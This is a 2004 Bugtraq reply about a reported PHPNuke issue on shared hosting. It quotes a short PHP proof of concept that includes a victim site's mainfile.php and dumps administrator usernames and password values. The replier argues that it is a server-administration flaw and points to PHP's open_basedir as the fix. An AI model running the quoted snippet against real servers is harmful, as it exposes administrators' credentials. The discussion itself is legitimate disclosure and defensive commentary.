Bugtraq: Re: [Full-Disclosure] Possible bug in PHPNuke and other CMS

[Sam Bashton <sam () ipsupport co uk>]

On Sun, May 30, 2004 at 04:53:18PM +0200, Luca Falavigna wrote:
> There is a vulnerability in PHPNuke that permits execution of arbitrary
> SQL queries on a database located in the same server of an attacker's
> account. This is the procedure: first of all attacker must create a
> symlink pointing to victim's db directory in PHPNuke home directory
> because of mainfile.php include method. After that he can build a simple
> php code executing a query to the PHPNuke database. Here is an example:
>
> <?php
> require_once ("/location_of_victim's_PHPNuke/mainfile.php");
> $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
> while($record = $db->sql_fetchrow($sql))
> ~  echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
> unset($sql);
> ?>
This is an administration issue rather than a security vulnerability.
In order to use this attack the attacker requires access to:

1.  Another site on the victim's server
2.  A sufficiently poorly administered server on which (s)he can:
    a.  Create a symlink 
    or
    b.  Specify an absolute path for includes

Those hosting multiple PHP sites ought to be using PHP's open_basedir
directive to limit the files that can be opened by PHP.  If this isn't
being used they are plenty of other easy attacks open to anyone with an
account on the same server.
    

-- 
Sam Bashton
Systems Administrator
IP Support